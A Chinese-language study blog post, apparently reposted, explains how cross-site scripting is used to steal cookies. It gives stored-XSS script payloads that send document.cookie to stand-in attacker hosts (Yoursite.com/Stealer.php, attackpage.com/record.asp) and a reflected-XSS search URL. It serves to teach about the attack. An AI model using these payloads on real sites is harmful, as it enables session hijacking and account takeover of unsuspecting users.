Cookie竊取攻擊剖析


#說實話我不喜歡國人寫的書,講個XSS的Cookie竊取還要先寫個好幾頁的Cookie的介紹。感覺除了占點地方沒別的用處了。
#要學什么就學什么,目標要盯牢,別學到一半覺得需要學另外的相關知識。wiki了解一下就行。
#要做什么,就准備什么。寧可簡單粗暴,不要曲線救國。攤子鋪大了,目標就模糊了,效率低,反饋慢,漸漸的就兜不回來了。-- 知乎mumu

 

  第二章開頭就回答了我的疑惑,XSS跨站腳本攻擊是通過正常的站內交互途徑如,發布評論,添加文章,發送郵件和留言等提交惡意的JavaScript腳本的內容文本,如果服務器沒有過濾或轉義這些腳本反而作為內容發布到Web頁面上,當其他用戶訪問該頁面時這些惡意腳本就會執行。上一篇的XSS代碼只是調用了一個alert函數。實則XSS能做的事情遠遠不僅僅如此。

  XSS的Cookie竊取攻擊剖析

方法1(持久型xss):

<script>location.href ='http://www.Yoursite.com/Stealer.php?cookie='+document.cookie;</script>

 

其中location.href是指頁面跳轉到http://www.Yoursite.com/Stealer.php?cookie='+document.cookie

 

通過XSS攻擊,由於注入代碼是在受害者的瀏覽器上執行,因此能夠很方便地竊取到受害者的Cookie信息。比如,我們只要注入類似如下的代碼:

<script>location.replace("http://www.attackpage.com/record.asp?secret=" + document.cookie)</script>

 

當受害者的瀏覽器執行這段腳本的時候,就會自動訪問攻擊者建立的網站www.attackpage.com,打開其中的recourd.asp,將受害者瀏覽器的Cookie信息給記錄下來。這樣,攻擊者就得到了用戶的Cookie信息。

得到受害者的Cookie信息后,攻擊者可以很方便地冒充受害者,從而擁有其在目標服務器上的所有權限,相當於受害者的身份認證被竊取了。這樣,攻擊者可以任意地利用受害者的身份訪問服務器上的資源和服務,甚至對受害者和服務器上的數據進行破壞。如果受害者擁有管理員權限,攻擊者還可以利用其提升自己賬號的權限,從而進行進一步的攻擊。

方法2(反射型xss):

 http://www.targetserver.com/search.asp?input=<script>alert(document.cookie);</script>

 

 當受害者點擊這個鏈接的時候,注入的腳本被當作搜索的關鍵詞發送到目標服務器的search.asp頁面中,則在搜索結果的返回頁面中,這段腳本將被當作搜索的關鍵詞而嵌入。這樣,當用戶得到搜索結果頁面后,這段腳本也得到了執行。這就是反射型XSS攻擊的原理。

 

上面攻擊的本質都是觸發一個HTTP GET 請求把 Cookie 信息作為URL的一部分參數傳給攻擊者的服務器然后攻擊者 通過查看日志即可獲取到 Cookie 信息,對於包含特殊字符的Cookie信息可以使用encodeURIComponent函數進行編碼傳輸。

 

最后本篇博文並未實際自己實踐過,只是整理歸納了一些常見處理方法。搭建虛擬網站和實踐是明天的事情了。

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM